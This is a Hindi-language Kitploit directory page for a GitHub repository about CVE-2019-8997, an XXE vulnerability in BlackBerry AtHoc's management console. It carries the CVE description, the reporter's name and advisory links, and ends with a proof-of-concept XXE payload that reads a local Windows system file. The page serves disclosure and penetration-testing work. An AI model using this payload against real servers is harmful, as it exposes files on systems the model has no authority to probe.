Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-8997 — BlackBerry AtHoc के प्रबंधन प्रणाली (कंसोल) में 7.6 HF-567 से पहले के संस्करणों में एक XML External Entity Injection (XXE) भेद्यता किसी हमलावर को किसी मौजूदा फ़ील्ड में दुर्भावनापूर्ण रूप से निर्मित XML डालकर एप्लिकेशन सर्वर से मनमानी स्थानीय फ़ाइलें पढ़ने या नेटवर्क पर अनुरोध करने की अनुमति दे सकती है। | Kitploit
उपकरण/GitHubGitHub/nxkennedy/cve-2019-8997
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubnxkennedy/cve-2019-8997

CVE-2019-8997

रिपॉजिटरी देखें
2236 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

BlackBerry AtHoc के प्रबंधन प्रणाली (कंसोल) में 7.6 HF-567 से पहले के संस्करणों में एक XML External Entity Injection (XXE) भेद्यता किसी हमलावर को किसी मौजूदा फ़ील्ड में दुर्भावनापूर्ण रूप से निर्मित XML डालकर एप्लिकेशन सर्वर से मनमानी स्थानीय फ़ाइलें पढ़ने या नेटवर्क पर अनुरोध करने की अनुमति दे सकती है।

साझा करें

CVE-2019-8997

BlackBerry AtHoc के प्रबंधन प्रणाली (कंसोल) में 7.6 HF-567 से पहले के संस्करणों में पाई जाने वाली XML बाह्य इकाई इंजेक्शन (XXE) भेद्यता, किसी हमलावर को किसी मौजूदा फ़ील्ड में दुर्भावनापूर्ण रूप से निर्मित XML दर्ज करके एप्लिकेशन सर्वर से मनमानी स्थानीय फ़ाइलों को पढ़ने या नेटवर्क पर अनुरोध करने की अनुमति दे सकती है।

रिपोर्टकर्ता

Nolan B. Kennedy (nxkennedy)

सुरक्षा परामर्श

http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997

ब्लॉग पोस्ट

https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/

प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट

<!DOCTYPE doc [
<!ELEMENT doc ANY > 
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">

<doc>&foo;</doc>

<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>
टूल डाउनलोड करें